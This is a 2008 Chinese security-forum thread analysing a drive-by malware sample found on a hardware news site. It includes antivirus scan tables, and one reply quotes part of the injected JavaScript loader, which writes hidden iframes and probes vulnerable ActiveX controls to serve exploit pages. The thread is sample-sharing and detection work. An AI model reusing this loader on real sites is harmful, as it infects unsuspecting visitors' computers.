收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 一马之20080827
12下一页
返回列表 发新帖
查看: 2328|回复: 13
收起左侧

[病毒样本] 一马之20080827

[复制链接]
小飞侠.net
发表于 2008-8-27 13:51:11 | 显示全部楼层 |阅读模式
一马之20080827

document.write("<iframe width=20 height=0 src=14.htm></iframe>");---其中有这一句,不会是被挂马了吧?这个样本是在驱动之家找到的,现再访问已解决。

文件 ddd.rar 接收于 2008.08.27 07:43:02 (CET)
反病毒引擎 版本 最后更新 扫描结果
AhnLab-V3 2008.8.27.0 2008.08.27 -
AntiVir 7.8.1.23 2008.08.26 -
Authentium 5.1.0.4 2008.08.27 -
Avast 4.8.1195.0 2008.08.26 VBS:Obfuscated-gen
AVG 8.0.0.161 2008.08.26 Exploit
BitDefender 7.2 2008.08.27 -
CAT-QuickHeal 9.50 2008.08.26 -
ClamAV 0.93.1 2008.08.27 -
DrWeb 4.44.0.09170 2008.08.26 -
eSafe 7.0.17.0 2008.08.26 -
eTrust-Vet 31.6.6050 2008.08.26 -
Ewido 4.0 2008.08.26 Downloader.Timul.cw
F-Prot 4.4.4.56 2008.08.26 -
F-Secure 7.60.13501.0 2008.08.27 -
Fortinet 3.14.0.0 2008.08.26 -
GData 19 2008.08.27 VBS:Obfuscated-gen
Ikarus T3.1.1.34.0 2008.08.27 -
K7AntiVirus 7.10.428 2008.08.25 -
Kaspersky 7.0.0.125 2008.08.27 -
McAfee 5370 2008.08.26 -
Microsoft 1.3807 2008.08.25 Exploit:JS/Axdow.C
NOD32v2 3390 2008.08.26 -
Norman 5.80.02 2008.08.26 -
Panda 9.0.0.4 2008.08.26 -
PCTools 4.4.2.0 2008.08.26 -
Prevx1 V2 2008.08.27 -
Rising 20.59.12.00 2008.08.27 -
Sophos 4.32.0 2008.08.27 -
Sunbelt 3.1.1582.1 2008.08.26 -
Symantec 10 2008.08.27 -
TheHacker 6.3.0.6.060 2008.08.23 -
TrendMicro 8.700.0.1004 2008.08.27 -
VBA32 3.12.8.4 2008.08.26 -
ViRobot 2008.8.26.1350 2008.08.26 -
VirusBuster 4.5.11.0 2008.08.26 -
Webwasher-Gateway 6.6.2 2008.08.26 -
附加信息
File size: 1047 bytes
MD5...: 9633f6d4a138ed5723795fe5f16af751
SHA1..: 9aa663a31f9f45901b85a69baff6c1e6a1fe9a4c
SHA256: 1474d959a99654165a72426a13d38d5d4f4a3b28809ac58923c14fd8486aa80f
SHA512: 0faeee70da90232d18702e38ebe926064f6cc992df24754ed3eec32b66988c94
ac6697d3bc357489a32e290594128af598dd0b5e2e40abb1d772b1a67474886c
PEiD..: -
PEInfo: -

VirSCAN.org Scanned Report :
Scanned time   : 2008/08/27 13:44:10 (CST)
Scanner results: 11%的杀软(4/36)报告发现病毒
File Name      : ddd.rar
File Size      : 1047 byte
File Type      : RAR archive data, v1d, os
MD5            : 9633f6d4a138ed5723795fe5f16af751
SHA1           : 9aa663a31f9f45901b85a69baff6c1e6a1fe9a4c
Online report  : ht tp://virscan.org/report/b4947a344a765234a5d696847f835aa4.html

Scanner        Engine Ver      Sig Ver           Sig Date    Time   Scan result
a-squared      3.5.0.22        2008.08.26        2008-08-26  6.99   -
安博士V3       2008.08.27.00   2008.08.27        2008-08-27  0.88   -
AntiVir        7.8.1.23        7.0.6.74          2008-08-26  2.23   -
Arcavir        1.0.5           200808261810      2008-08-26  1.16   -
AVAST!         3.0.1           080826-0          2008-08-26  0.70   VBS:Obfuscated-gen [Trj]
AVG            7.5.51.442      270.6.9/1636      2008-08-26  1.53   -
BitDefender    7.60825.1619922 7.20689           2008-08-27  2.91   -
CA (VET)       9.0.0.143       31.6.6050         2008-08-26  6.12   -
ClamAV         0.93.3          8096              2008-08-27  0.00   -
Comodo         2.11            2.0.0.628         2008-08-26  0.44   -
CP Secure      1.1.0.715       2008.08.27        2008-08-27  6.29   Troj.Downloader.JS.Timul.cw
Dr.Web         4.44.0.9170     2008.08.26        2008-08-26  3.11   -
ewido          4.0.0.2         2008.08.26        2008-08-26  3.41   Downloader.Timul.cw
F-Prot         4.4.4.56        20080826          2008-08-26  0.98   -
F-Secure       5.51.6100       2008.08.27.02     2008-08-27  3.15   -
飞塔           2.81-3.11       9.472             2008-08-25  1.73   -
ViRobot        20080826        2008.08.26        2008-08-26  0.44   -
Ikarus         T3.1.01.34      2008.08.27.71346  2008-08-27  3.14   -
江民杀毒       11.0.706        2008.08.27        2008-08-27  1.21   -
卡巴斯基       5.5.10          2008.08.27        2008-08-27  0.02   -
金山毒霸       2008.1.14.15    2008.8.27.14      2008-08-27  0.58   -
迈克菲         5.2.00          5370              2008-08-26  2.95   -
Microsoft      1.3807          2008.08.26        2008-08-26  4.74   Exploit:JS/Axdow.C
mks_vir        2.01            2008.08.25        2008-08-25  2.55   -
Norman         5.93.01         5.93.00           2008-08-26  4.96   -
熊猫卫士       9.05.01         2008.08.26        2008-08-26  2.16   -
趋势科技       8.700-1004      5.502.01          2008-08-26  0.02   -
Quick Heal     9.50            2008.08.26        2008-08-26  2.17   -
瑞星           20.0            20.59.12.00       2008-08-26  0.28   -
Sophos         2.77.0          4.32              2008-08-27  1.94   -
Sunbelt        3.1.1582.1      2204              2008-08-25  0.40   -
赛门铁克       1.3.0.24        20080826.023      2008-08-26  0.24   -
nProtect       2008-08-25.00   1927364           2008-08-25  3.79   -
The Hacker     6.3.0.6         v00060            2008-08-22  0.37   -
VBA32          3.12.8.4        20080826.0635     2008-08-26  1.13   -
VirusBuster    4.5.11.10       10.84.12/598596   2008-08-26  0.78   -
回复

举报

Kitman
发表于 2008-8-27 13:58:13 | 显示全部楼层
The file 'cn9[2].htm' has been determined to be 'UNDER ANALYSIS'.
回复

举报

Nerazzurri
发表于 2008-8-27 14:20:10 | 显示全部楼层
VBS:Obfuscated-gen [Trj]
回复

举报

putin
头像被屏蔽
发表于 2008-8-27 16:00:41 | 显示全部楼层
费尔杀之!
回复

举报

sbbdms
发表于 2008-8-27 17:00:52 | 显示全部楼层
Kaspersky miss
TO KL
回复

举报

wusuobuzai
发表于 2008-8-27 17:21:09 | 显示全部楼层
驱动之家应该不会被挂马吧?
回复

举报

电影结束了
发表于 2008-8-27 17:27:40 | 显示全部楼层

应该挂马了~
14.htm
flash.htm
回复

举报

qigang
发表于 2008-8-27 17:30:26 | 显示全部楼层

报哪行?

<script>
document.write("<iframe width=20 height=0 src=flash.htm></iframe>");
window.status="完成";
window.onerror=function(){return true;}
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=20 height=0 src=14.htm></iframe>");
try{var f;
var qw=new ActiveXObject("GLIEDown.IEDown.1");}
catch(f){};                     
finally{if(f!="[object Error]"){document.write("<iframe width=100 height=0 src=lz.htm></iframe>");}}
try{var n;
var hm=new ActiveXObject("snpvw.Snapshot Viewer Control.1");}
catch(n){};                     
finally{if(n!="[object Error]"){document.write("<iframe width=100 height=0 src=office.htm></iframe>");}}
function test()
{
rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Like = new ActiveXObject(rrooxx);
}catc
回复

举报

qigang
发表于 2008-8-27 17:31:26 | 显示全部楼层
需要全部网址链接。
回复

举报

电影结束了
发表于 2008-8-27 17:32:13 | 显示全部楼层

就是不知道全部链接。。。~
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-7-14 21:30 , Processed in 0.138640 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表